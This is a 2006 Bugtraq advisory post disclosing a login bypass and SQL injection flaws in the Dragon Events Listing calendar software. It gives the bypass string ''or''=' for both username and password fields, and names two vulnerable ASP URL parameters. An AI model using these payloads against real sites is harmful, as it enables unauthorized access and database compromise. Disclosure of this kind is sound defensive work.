Bugtraq mailing list archives
Dragon calendar [ login bypass & injection sql ]
From: saps.audit () gmail com
Date: 15 Nov 2006 15:27:34 -0000
vendor site:http://www.dragoninternet.net/ product:Dragon Events Listing bug:login bypass & injection sql risk:high login bypass : username: 'or''=' passwd: 'or''=' injection sql (get) http://site.com/event_searchdetail.asp?ID='[sql] http://site.com/venue_detail.asp?VenueID='[sql] laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit () gmail com
Current thread:
- Dragon calendar [ login bypass & injection sql ] saps . audit (Nov 15)